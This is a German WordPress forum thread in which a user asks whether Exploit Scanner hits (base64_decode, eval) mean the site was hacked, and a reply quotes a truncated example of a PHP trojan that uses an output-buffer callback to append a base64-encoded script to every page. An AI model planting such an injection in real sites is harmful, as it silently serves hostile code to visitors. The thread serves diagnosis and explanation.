Hallo WP-Community,
als ich heute meine Webseite aufrief, musste ich feststellen das manche Bilder sehr langsam laden bzw die seite plötzlich nicht mehr aufzurufen war. Desweiteren bemerkte ich das meine Seite ungewöhnlich lange Ladezeiten benötigt. Draufhin ließ ich im Backend den Exploit Scanner seine arbeit verichten. Er fand einige Fragwürdige Stellen darunter auch:
[FONT=Courier New]$content = base64_decode($resources[ $_GET['resource'] ]);[/FONT]
[FONT=Courier New][/FONT]
[FONT=Courier New]im Bereich: wp-content/plugins/secure-wordpress/secure-wordpress.php:59 Used by malicious scripts to decode previously obscured data/programs[/FONT]
[FONT=Courier New][/FONT]
[FONT=Courier New]könnte das die Ursache sein ? ist dies evtl. ein Anzeichen für ein Hack ? [/FONT]
[FONT=Courier New][/FONT]
[FONT=Courier New]Desweiteren fand ich auch ein paar Dateien mit einem sval:[/FONT]
[FONT=Courier New]* Javascript, and can be directly eval()'ed with no further parsing[/FONT]
[FONT=Courier New][/FONT]
[FONT=Courier New]Hat jemand diesbezüglich bereits Erfahrungen gemacht und handelt es scih tatsächlich um einen Hack ?[/FONT]
[FONT=Courier New][/FONT]
[FONT=Courier New]Grüße[/FONT]
Schadcode
-
-
- Gerade eben
- Anzeige
Hallo!
Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.
- ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
- ✔️ Deutsche Server & DSGVO-konform
- ✔️ Persönlicher Support (kein 0815-Ticket-System)
-
Bin die ganze Zeit bereits am Suchen und habe sehr viel verschiedene Dinge im Netz darüber gefunden doch leider werd ich aus dem ganzen irgendwie nicht schlau :confused:
-
Draufhin ließ ich im Backend den Exploit Scanner seine arbeit verichten.ja toll .. bringt jetzt sicherlich total viel? ein PHP Script sucht in einem PHP Script nach "[FONT=Courier New]base64_decode[/FONT]" und "[FONT=Courier New]eval" [/FONT]
Er fand einige Fragwürdige Stellen darunter auch:
[FONT=Courier New]$content = base64_decode($resources[ $_GET['resource'] ]);[/FONT]Und was ist daran jetzt fragwürdig - ausser, das dort *[FONT=Courier New]base64_decode* verwendet wird?
So sieht ein Trojaner in einem PHP Script aus
[/FONT]
PHPob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD4NCihmdW5jdGlvbigkJCxfMixfMSxkb2MsdGspI[FONT=Courier New]
[/FONT]
[FONT=Courier New]Desweiteren fand ich auch ein paar Dateien mit einem sval:[/FONT]
[FONT=Courier New]* Javascript, and can be directly eval()'ed with no further [/FONT][FONT=Courier New][/FONT]eval ist in PHP böse (tm) macht man nicht - verwendet man nicht in PHP in JavaScripten ist dies allerdings üblich.
viel spass beim weiter raten... tipp es gibt hier ein job forum
cu
ralf
-
Bei welchen Dateien kommt denn die Meldung genau?
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!